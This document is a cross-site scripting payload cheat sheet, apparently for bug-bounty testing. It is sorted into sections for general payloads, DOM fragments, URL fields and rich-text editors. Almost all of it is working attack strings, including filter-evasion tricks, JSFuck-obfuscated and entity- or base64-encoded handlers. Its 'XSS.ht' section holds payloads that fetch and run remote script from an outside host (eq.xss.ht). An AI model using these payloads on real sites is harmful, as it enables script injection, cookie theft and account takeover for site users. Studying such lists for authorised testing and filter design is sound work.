===============================Frequently used Payloads start===============================

<base href=//knoxss.me?>
xss"'><embed/src=javascript:alert(document.domain)>
<script src=//14.rs>
'"></script><script>alert(0)</script>
m"onmouseover="prompt(-11)
n'onmouseover='prompt(-12)
<</div>script</div>>alert()<</div>/script</div>>
<a href=prompt()>CLICK ME!</a>
<? #a="><style/onload=\u0061lert`1`>">
http://brutelogic.com.br/poc.svg
'-setTimeout`prompt\u0028document.domain\u0029`-'
<a href="data:text/html;<img src=x onerror=alert(document.domain)>,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#32;&#115;&#114;&#99;&#61;&#100;&#97;&#116;&#97;&#58;&#116;&#101;&#120;&#116;&#47;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#44;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">hgjg</a>

'"><img src=x onerror=alert(-31)>
'"><script>alert(-1)</script><
<video><source src=x onerror=alert(-2)></video>
'"></script><video><source src=x onerror=alert(-4)></video>
'"></script><svg onload=prompt(-3)>
'><svg/onload=alert(5)>

<iframe <><a href=javascript&colon;alert(document.cookie)>Click Here</a>=&gt;&lt;/iframe&gt;
<img src=1 onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()"">
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
<iframe>
    </iframe><svg onload=alert(-9)>
</iframe>
)</scr<ScRipT>ipt>"><script>alert('XSS')</script>
<div onclick="javascript:alert`-10`" > Click me! </div>

=============================== Frequently used Payloads end ===============================

=========================== DOM XSS through path fragment start ============================
https://www.target.com/'-alert(origin)-'
https://www.target.com/login.html?#a"-alert(origin)-"
===========================  DOM XSS through path fragment end  ============================

===============================    URL INPUT FIELDS START    ===============================

https://google.com"onmouseover="prompt(1)
https://google.com'onmouseover='prompt(2)
https://www.domain.com/abc#<script>alert(1)</script>
https://www.icloud.com/mail/#<script></script>https://www.icloud.com/onmouseover=location=/javascript:alert`document.domain`/.source;//


===============================     URL INPUT FIELDS END     ===============================

=============================== For Rich Text editors start  ===============================

<div><a href="javascript:prompt()">CLICK ME</a> <b>2</b> <base href=//knoxss.me?> <b>2</b> <a href="https://google.com" onmouseover=prompt()">CLICK ME</a></div>

<style></sty</style>
<style>le><script>alert(1)</script></style>
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(-6)">
<math><mtext><table><mglyph><style><math><table id="</table>"><video><source src=x onerror=alert(-7)">

===============================  For Rich Text editors end   ===============================

=============================== XSS.ht start ===============================

'"><script src=https://eq.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://eq.xss.ht\';document.body.appendChild(a)')
"onmouseover="eval('var a=document.createElement(\'script\');a.src=\'https://eq.xss.ht\';document.body.appendChild(a)')
'onmouseover='eval("var a=document.createElement(\'script\');a.src=\'https://eq.xss.ht\';document.body.appendChild(a)")
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;eq.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//eq.xss.ht");a.send();</script>
<script>$.getScript("//eq.xss.ht")</script>

=============================== XSS.ht end ===============================

Temp uses:
a'><script>alert(0)</script>'a
\u0061lert(-11)

Useful Links:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet
http://seguretat.wiki.uoc.edu/index.php/XSS_Cheat_Sheet
